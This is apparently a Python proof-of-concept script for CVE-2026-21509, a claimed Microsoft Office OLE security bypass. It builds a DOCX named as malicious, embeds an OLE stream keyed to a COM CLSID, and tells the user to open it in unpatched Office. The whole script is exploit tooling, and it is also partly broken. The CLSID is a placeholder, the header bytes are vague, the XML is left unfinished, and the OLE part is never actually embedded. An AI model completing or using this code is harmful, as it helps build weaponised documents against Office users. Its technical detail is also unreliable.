# CVE-2026-21509 PoC - Microsoft Office OLE Bypass (Conceptual)
# Generates a DOCX with embedded OLE object to test security bypass
# Requirements: pip install python-docx olefile
# Author: Ashwesker ==> https://github.com/Ashwesker/Ashwesker-CVE-2026-21509
# Run on any OS; open output file in vulnerable Office VM (pre-Jan 26, 2026 patch)

import argparse
from docx import Document
from docx.oxml.ns import qn
from docx.oxml import OxmlElement
from docx.shared import Inches
import olefile
import io
import uuid

def create_malicious_docx(output_path, clsid="EAB22AC3-30C1-11CF-A7EB-0000C05BAE0B"):
    """
    Create DOCX with embedded OLE object.
    clsid: Placeholder for vulnerable COM CLSID (replace with real one from OleViewDotNet)
    """
    doc = Document()
    
    # Add innocent text
    doc.add_paragraph("Test document for CVE-2026-21509 research. Open to check OLE handling.")
    
    # Generate minimal OLE stream (header + CLSID)
    ole_stream = generate_ole_stream(clsid)
    
    # Embed as OLE object
    # Use OpenXML to add embedded object
    # Note: python-docx doesn't directly support OLE, so we use low-level XML
    paragraph = doc.add_paragraph()
    run = paragraph.add_run()
    
    # Create drawing element for embedded object
    drawing = OxmlElement('w:drawing')
    inline = OxmlElement('wp:inline')
    extent = OxmlElement('wp:extent')
    extent.set(qn('cx'), '1905000')  # ~2 inches
    extent.set(qn('cy'), '1905000')
    inline.append(extent)
    
    docPr = OxmlElement('wp:docPr')
    docPr.set('id', str(uuid.uuid4().int % 2**31))
    docPr.set('name', 'Embedded OLE')
    inline.append(docPr)
    
    graphic = OxmlElement('a:graphic')
    graphic_data = OxmlElement('a:graphicData')
    graphic_data.set(qn('uri'), 'http://schemas.openxmlformats.org/drawingml/2006/picture')
    
    # Embed OLE as picture fallback (simplified; real OLE needs binary part)
    pic = OxmlElement('pic:pic')
    pic.set(qn('xmlns:pic'), 'http://schemas.openxmlformats.org/drawingml/2006/picture')
    # ... (add blipFill, etc. for actual image fallback)
    
    graphic_data.append(pic)
    graphic.append(graphic_data)
    inline.append(graphic)
    drawing.append(inline)
    run._r.append(drawing)
    
    # Add OLE binary part (alternative format import)
    # python-docx doesn't support directly; use olefile to create .bin
    ole_bin_path = "embedded_ole.bin"
    with open(ole_bin_path, 'wb') as f:
        f.write(ole_stream)
    
    print(f"OLE binary saved as {ole_bin_path} (embed manually in DOCX if needed via tools like oletools)")
    
    doc.save(output_path)
    print(f"Generated malicious DOCX: {output_path}")
    print("Open in vulnerable Office (pre-patch) to test bypass. Use isolated VM!")

def generate_ole_stream(clsid_str):
    """
    Generate basic OLE1 stream: header + CLSID
    Real exploit would include malicious binary/shellcode trigger
    """
    try:
        clsid = uuid.UUID(clsid_str)
        clsid_bytes = clsid.bytes_le  # Little-endian for OLE
    except:
        clsid_bytes = b'\x00' * 16  # Fallback
    
    # Minimal OLE header (version 1.0, etc.)
    header = (
        b'\x01\x05\x00\x00'  # Format ID
        b'\x02\x00\x00\x00'  # OLE version
        b'\x0C\x00\x00\x00'  # Some flags
        # More headers...
    )
    
    # Append CLSID
    payload = header + clsid_bytes
    
    # Pad or add dummy data (extend for real payload)
    payload += b'\x00' * (512 - len(payload))  # Rough padding
    
    return payload

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="CVE-2026-21509 PoC - OLE Embed in DOCX")
    parser.add_argument("--output", default="CVE-2026-21509_Test.docx", help="Output DOCX path")
    parser.add_argument("--clsid", default="EAB22AC3-30C1-11CF-A7EB-0000C05BAE0B", help="COM CLSID to embed")
    
    args = parser.parse_args()
    
    create_malicious_docx(args.output, args.clsid)
